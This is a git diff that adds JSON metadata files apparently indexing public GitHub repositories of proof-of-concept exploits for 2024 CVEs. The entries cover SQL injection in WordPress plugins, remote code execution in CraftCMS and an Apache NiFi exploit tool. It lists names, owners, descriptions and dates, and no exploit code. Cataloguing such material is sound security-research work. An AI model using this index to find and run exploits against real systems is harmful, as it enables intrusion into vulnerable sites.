"ugurkarakoc1\/CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability-", + "owner": { + "login": "ugurkarakoc1", + "id": 171127980, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171127980?v=4", + "html_url": "https:\/\/github.com\/ugurkarakoc1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ugurkarakoc1\/CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability-", + "description": null, + "fork": false, + "created_at": "2024-12-10T19:40:26Z", + "updated_at": "2024-12-10T19:43:56Z", + "pushed_at": "2024-12-10T19:43:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5522.json b/2024/CVE-2024-5522.json new file mode 100644 index 0000000000..e0a5d0cadb --- /dev/null +++ b/2024/CVE-2024-5522.json @@ -0,0 +1,110 @@ +[ + { + "id": 808441201, + "name": "CVE-2024-5522-Poc", + "full_name": "truonghuuphuc\/CVE-2024-5522-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-5522-Poc", + "description": "CVE-2024-5522 HTML5 Video Player <= 2.5.26 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-05-31T04:41:46Z", + "updated_at": "2024-07-24T14:22:31Z", + "pushed_at": "2024-05-31T06:44:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 855566883, + "name": "CVE-2024-5522-PoC", + "full_name": "kryptonproject\/CVE-2024-5522-PoC", + "owner": { + "login": "kryptonproject", + "id": 147995594, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/147995594?v=4", + "html_url": "https:\/\/github.com\/kryptonproject", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kryptonproject\/CVE-2024-5522-PoC", + "description": null, + "fork": false, + "created_at": "2024-09-11T04:46:46Z", + "updated_at": "2024-09-11T05:46:06Z", + "pushed_at": "2024-09-11T05:46:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 866079798, + "name": "CVE-2024-5522", + "full_name": "geniuszly\/CVE-2024-5522", + "owner": { + "login": "geniuszly", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszly\/CVE-2024-5522", + "description": "A PoC exploit scanner for CVE-2024-5522 vulnerability in WordPress websites", + "fork": false, + "created_at": "2024-10-01T16:02:12Z", + "updated_at": "2024-11-20T16:31:06Z", + "pushed_at": "2024-10-01T16:03:38Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "buffer-overflow", + "cve", + "cve-2024-5522", + "cybersecurity", + "ethical-hacking", + "exploit", + "exploit-development", + "linux", + "poc", + "security", + "vulnerability", + "vulnerability-research", + "wordpress", + "wp" + ], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-55457.json b/2024/CVE-2024-55457.json new file mode 100644 index 0000000000..1245b5e959 --- /dev/null +++ b/2024/CVE-2024-55457.json @@ -0,0 +1,33 @@ +[ + { + "id": 912328942, + "name": "CVE-2024-55457-PoC", + "full_name": "h13nh04ng\/CVE-2024-55457-PoC", + "owner": { + "login": "h13nh04ng", + "id": 86940873, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86940873?v=4", + "html_url": "https:\/\/github.com\/h13nh04ng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h13nh04ng\/CVE-2024-55457-PoC", + "description": null, + "fork": false, + "created_at": "2025-01-05T09:07:46Z", + "updated_at": "2025-01-05T09:19:35Z", + "pushed_at": "2025-01-05T09:19:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-55557.json b/2024/CVE-2024-55557.json new file mode 100644 index 0000000000..cba92e2570 --- /dev/null +++ b/2024/CVE-2024-55557.json @@ -0,0 +1,36 @@ +[ + { + "id": 901530255, + "name": "CVE-2024-55557", + "full_name": "partywavesec\/CVE-2024-55557", + "owner": { + "login": "partywavesec", + "id": 98420665, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98420665?v=4", + "html_url": "https:\/\/github.com\/partywavesec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/partywavesec\/CVE-2024-55557", + "description": "CVE-2024-55557", + "fork": false, + "created_at": "2024-12-10T20:38:03Z", + "updated_at": "2024-12-30T23:20:49Z", + "pushed_at": "2024-12-30T23:10:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-55557", + "security" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-55587.json b/2024/CVE-2024-55587.json new file mode 100644 index 0000000000..467bb6f0d2 --- /dev/null +++ b/2024/CVE-2024-55587.json @@ -0,0 +1,33 @@ +[ + { + "id": 901168926, + "name": "CVE-2024-55587", + "full_name": "CSIRTTrizna\/CVE-2024-55587", + "owner": { + "login": "CSIRTTrizna", + "id": 170928596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170928596?v=4", + "html_url": "https:\/\/github.com\/CSIRTTrizna", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CSIRTTrizna\/CVE-2024-55587", + "description": null, + "fork": false, + "created_at": "2024-12-10T06:59:00Z", + "updated_at": "2024-12-15T16:54:02Z", + "pushed_at": "2024-12-10T07:05:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-55875.json b/2024/CVE-2024-55875.json new file mode 100644 index 0000000000..b24e5a6eae --- /dev/null +++ b/2024/CVE-2024-55875.json @@ -0,0 +1,33 @@ +[ + { + "id": 902723062, + "name": "CVE-2024-55875", + "full_name": "JAckLosingHeart\/CVE-2024-55875", + "owner": { + "login": "JAckLosingHeart", + "id": 57932150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57932150?v=4", + "html_url": "https:\/\/github.com\/JAckLosingHeart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JAckLosingHeart\/CVE-2024-55875", + "description": "CVE-2024-55875 | GHSA-7mj5-hjjj-8rgw | http4k first CVE", + "fork": false, + "created_at": "2024-12-13T06:21:36Z", + "updated_at": "2025-01-03T14:51:11Z", + "pushed_at": "2024-12-13T07:28:34Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-55968.json b/2024/CVE-2024-55968.json new file mode 100644 index 0000000000..1017f299b2 --- /dev/null +++ b/2024/CVE-2024-55968.json @@ -0,0 +1,64 @@ +[ + { + "id": 904942381, + "name": "CVE-2024-55968", + "full_name": "Wi1DN00B\/CVE-2024-55968", + "owner": { + "login": "Wi1DN00B", + "id": 103459492, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103459492?v=4", + "html_url": "https:\/\/github.com\/Wi1DN00B", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wi1DN00B\/CVE-2024-55968", + "description": "Exploit POC Code for CVE-2024-55968", + "fork": false, + "created_at": "2024-12-17T21:07:59Z", + "updated_at": "2024-12-19T04:47:33Z", + "pushed_at": "2024-12-19T04:47:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 904942447, + "name": "CVE-2024-55968", + "full_name": "null-event\/CVE-2024-55968", + "owner": { + "login": "null-event", + "id": 47583736, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47583736?v=4", + "html_url": "https:\/\/github.com\/null-event", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/null-event\/CVE-2024-55968", + "description": "POC for DTEX LPE (CVE-2024-55968)", + "fork": false, + "created_at": "2024-12-17T21:08:11Z", + "updated_at": "2024-12-17T21:28:14Z", + "pushed_at": "2024-12-17T21:14:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-55972.json b/2024/CVE-2024-55972.json new file mode 100644 index 0000000000..bd6759cc77 --- /dev/null +++ b/2024/CVE-2024-55972.json @@ -0,0 +1,33 @@ +[ + { + "id": 911617043, + "name": "CVE-2024-55972", + "full_name": "RandomRobbieBF\/CVE-2024-55972", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-55972", + "description": "eTemplates <= 0.2.1 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2025-01-03T12:47:01Z", + "updated_at": "2025-01-06T09:25:28Z", + "pushed_at": "2025-01-03T12:48:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-55976.json b/2024/CVE-2024-55976.json new file mode 100644 index 0000000000..dd78693a9a --- /dev/null +++ b/2024/CVE-2024-55976.json @@ -0,0 +1,33 @@ +[ + { + "id": 911633099, + "name": "CVE-2024-55976", + "full_name": "RandomRobbieBF\/CVE-2024-55976", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-55976", + "description": "Critical Site Intel <= 1.0 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2025-01-03T13:32:11Z", + "updated_at": "2025-01-06T09:26:23Z", + "pushed_at": "2025-01-03T13:33:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-55978.json b/2024/CVE-2024-55978.json new file mode 100644 index 0000000000..512710946d --- /dev/null +++ b/2024/CVE-2024-55978.json @@ -0,0 +1,33 @@ +[ + { + "id": 911200848, + "name": "CVE-2024-55978", + "full_name": "RandomRobbieBF\/CVE-2024-55978", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-55978", + "description": "Code Generator Pro <= 1.2 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2025-01-02T13:21:36Z", + "updated_at": "2025-01-06T13:26:00Z", + "pushed_at": "2025-01-02T13:25:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-55980.json b/2024/CVE-2024-55980.json new file mode 100644 index 0000000000..b31c5b5848 --- /dev/null +++ b/2024/CVE-2024-55980.json @@ -0,0 +1,33 @@ +[ + { + "id": 911153744, + "name": "CVE-2024-55980", + "full_name": "RandomRobbieBF\/CVE-2024-55980", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-55980", + "description": "Wr Age Verification <= 2.0.0 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2025-01-02T11:11:48Z", + "updated_at": "2025-01-06T13:26:50Z", + "pushed_at": "2025-01-02T11:15:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-55981.json b/2024/CVE-2024-55981.json new file mode 100644 index 0000000000..8423ac43b6 --- /dev/null +++ b/2024/CVE-2024-55981.json @@ -0,0 +1,33 @@ +[ + { + "id": 911614124, + "name": "CVE-2024-55981", + "full_name": "RandomRobbieBF\/CVE-2024-55981", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-55981", + "description": "Nabz Image Gallery <= v1.00 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2025-01-03T12:38:29Z", + "updated_at": "2025-01-06T09:27:13Z", + "pushed_at": "2025-01-03T12:39:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-55982.json b/2024/CVE-2024-55982.json new file mode 100644 index 0000000000..f31f071c42 --- /dev/null +++ b/2024/CVE-2024-55982.json @@ -0,0 +1,33 @@ +[ + { + "id": 911609279, + "name": "CVE-2024-55982", + "full_name": "RandomRobbieBF\/CVE-2024-55982", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-55982", + "description": "Share Buttons – Social Media <= 1.0.2 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2025-01-03T12:23:50Z", + "updated_at": "2025-01-06T09:28:03Z", + "pushed_at": "2025-01-03T12:25:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-55988.json b/2024/CVE-2024-55988.json new file mode 100644 index 0000000000..221704d866 --- /dev/null +++ b/2024/CVE-2024-55988.json @@ -0,0 +1,33 @@ +[ + { + "id": 911576506, + "name": "CVE-2024-55988", + "full_name": "RandomRobbieBF\/CVE-2024-55988", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-55988", + "description": "Navayan CSV Export <= 1.0.9 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2025-01-03T10:45:42Z", + "updated_at": "2025-01-03T18:41:23Z", + "pushed_at": "2025-01-03T11:02:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-56115.json b/2024/CVE-2024-56115.json new file mode 100644 index 0000000000..e526d3a83a --- /dev/null +++ b/2024/CVE-2024-56115.json @@ -0,0 +1,33 @@ +[ + { + "id": 904071998, + "name": "CVE-2024-56115", + "full_name": "ComplianceControl\/CVE-2024-56115", + "owner": { + "login": "ComplianceControl", + "id": 188841575, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188841575?v=4", + "html_url": "https:\/\/github.com\/ComplianceControl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ComplianceControl\/CVE-2024-56115", + "description": null, + "fork": false, + "created_at": "2024-12-16T07:46:41Z", + "updated_at": "2024-12-16T07:47:09Z", + "pushed_at": "2024-12-16T07:47:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-56116.json b/2024/CVE-2024-56116.json new file mode 100644 index 0000000000..0de27214d9 --- /dev/null +++ b/2024/CVE-2024-56116.json @@ -0,0 +1,33 @@ +[ + { + "id": 904070943, + "name": "CVE-2024-56116", + "full_name": "ComplianceControl\/CVE-2024-56116", + "owner": { + "login": "ComplianceControl", + "id": 188841575, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188841575?v=4", + "html_url": "https:\/\/github.com\/ComplianceControl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ComplianceControl\/CVE-2024-56116", + "description": null, + "fork": false, + "created_at": "2024-12-16T07:44:07Z", + "updated_at": "2024-12-16T07:46:19Z", + "pushed_at": "2024-12-16T07:46:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-56145.json b/2024/CVE-2024-56145.json new file mode 100644 index 0000000000..54d463e656 --- /dev/null +++ b/2024/CVE-2024-56145.json @@ -0,0 +1,64 @@ +[ + { + "id": 906042974, + "name": "CVE-2024-56145", + "full_name": "Chocapikk\/CVE-2024-56145", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-56145", + "description": "Unauthenticated RCE on CraftCMS when PHP `register_argc_argv` config setting is enabled", + "fork": false, + "created_at": "2024-12-20T03:34:01Z", + "updated_at": "2025-01-07T01:48:31Z", + "pushed_at": "2024-12-23T12:51:54Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 36, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 906949463, + "name": "CVE-2024-56145-craftcms-rce", + "full_name": "Sachinart\/CVE-2024-56145-craftcms-rce", + "owner": { + "login": "Sachinart", + "id": 18497191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18497191?v=4", + "html_url": "https:\/\/github.com\/Sachinart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sachinart\/CVE-2024-56145-craftcms-rce", + "description": "CVE-2024-56145 SSTI to RCE - twig templates ", + "fork": false, + "created_at": "2024-12-22T11:53:04Z", + "updated_at": "2024-12-25T01:44:47Z", + "pushed_at": "2024-12-22T15:02:07Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5633.json b/2024/CVE-2024-5633.json new file mode 100644 index 0000000000..7a58c5e48e --- /dev/null +++ b/2024/CVE-2024-5633.json @@ -0,0 +1,33 @@ +[ + { + "id": 831860560, + "name": "CVE-2024-5633", + "full_name": "Adikso\/CVE-2024-5633", + "owner": { + "login": "Adikso", + "id": 1407751, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1407751?v=4", + "html_url": "https:\/\/github.com\/Adikso", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Adikso\/CVE-2024-5633", + "description": "PoC for CVE-2024-5633", + "fork": false, + "created_at": "2024-07-21T20:27:24Z", + "updated_at": "2024-08-13T18:11:16Z", + "pushed_at": "2024-07-21T20:30:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-56331.json b/2024/CVE-2024-56331.json new file mode 100644 index 0000000000..7eb5341805 --- /dev/null +++ b/2024/CVE-2024-56331.json @@ -0,0 +1,33 @@ +[ + { + "id": 893793933, + "name": "CVE-2024-56331", + "full_name": "griisemine\/CVE-2024-56331", + "owner": { + "login": "griisemine", + "id": 45427131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45427131?v=4", + "html_url": "https:\/\/github.com\/griisemine", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/griisemine\/CVE-2024-56331", + "description": null, + "fork": false, + "created_at": "2024-11-25T08:16:38Z", + "updated_at": "2024-12-21T21:10:32Z", + "pushed_at": "2024-12-21T21:09:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-56431.json b/2024/CVE-2024-56431.json new file mode 100644 index 0000000000..d1d4b40c5d --- /dev/null +++ b/2024/CVE-2024-56431.json @@ -0,0 +1,33 @@ +[ + { + "id": 908074157, + "name": "libtheora-CVE-2024-56431-PoC", + "full_name": "UnionTech-Software\/libtheora-CVE-2024-56431-PoC", + "owner": { + "login": "UnionTech-Software", + "id": 190581312, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/190581312?v=4", + "html_url": "https:\/\/github.com\/UnionTech-Software", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UnionTech-Software\/libtheora-CVE-2024-56431-PoC", + "description": null, + "fork": false, + "created_at": "2024-12-25T03:58:50Z", + "updated_at": "2024-12-25T03:59:40Z", + "pushed_at": "2024-12-25T03:59:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-56433.json b/2024/CVE-2024-56433.json new file mode 100644 index 0000000000..d7e9e79f09 --- /dev/null +++ b/2024/CVE-2024-56433.json @@ -0,0 +1,33 @@ +[ + { + "id": 911625725, + "name": "CVE-2024-56433", + "full_name": "JonnyWhatshisface\/CVE-2024-56433", + "owner": { + "login": "JonnyWhatshisface", + "id": 6776518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6776518?v=4", + "html_url": "https:\/\/github.com\/JonnyWhatshisface", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JonnyWhatshisface\/CVE-2024-56433", + "description": "CVE-2024-56433 - shadow-utils Default subordinate ID for local users creates risk of collision", + "fork": false, + "created_at": "2025-01-03T13:11:25Z", + "updated_at": "2025-01-06T12:02:43Z", + "pushed_at": "2025-01-06T12:02:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-56512.json b/2024/CVE-2024-56512.json new file mode 100644 index 0000000000..9c345a4a3a --- /dev/null +++ b/2024/CVE-2024-56512.json @@ -0,0 +1,33 @@ +[ + { + "id": 912934520, + "name": "CVE-2024-56512-Apache-NiFi-Exploit", + "full_name": "absholi7ly\/CVE-2024-56512-Apache-NiFi-Exploit", + "owner": { + "login": "absholi7ly", + "id": 72062217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72062217?v=4", + "html_url": "https:\/\/github.com\/absholi7ly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/absholi7ly\/CVE-2024-56512-Apache-NiFi-Exploit", + "description": "A tool to exploit the CVE-2024-56512 vulnerability in Apache NiFi, which allows unauthorized access to sensitive data through improperly secured APIs.", + "fork": false, + "created_at": "2025-01-06T17:35:33Z", + "updated_at": "2025-01-06T23:11:22Z", + "pushed_at": "2025-01-06T17:51:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5735.json b/2024/CVE-2024-5735.json new file mode 100644 index 0000000000..0d5bd3dcff --- /dev/null +++ b/2024/CVE-2024-5735.json @@ -0,0 +1,33 @@ +[ + { + "id": 821339567, + "name": "CVE-2024-5735", + "full_name": "afine-com\/CVE-2024-5735", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2024-5735", + "description": "AdmirorFrames Joomla! Extension < 5.0 - Full Path Disclosure", + "fork": false, + "created_at": "2024-06-28T10:15:17Z", + "updated_at": "2024-06-28T10:25:21Z", + "pushed_at": "2024-06-28T10:22:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5736.json b/2024/CVE-2024-5736.json new file mode 100644 index 0000000000..e09b22a95d --- /dev/null +++ b/2024/CVE-2024-5736.json @@ -0,0 +1,33 @@ +[ + { + "id": 821343649, + "name": "CVE-2024-5736", + "full_name": "afine-com\/CVE-2024-5736", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2024-5736", + "description": "AdmirorFrames Joomla! Extension < 5.0 - Server-Side Request Forgery", + "fork": false, + "created_at": "2024-06-28T10:27:08Z", + "updated_at": "2024-06-28T10:37:25Z", + "pushed_at": "2024-06-28T10:35:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline 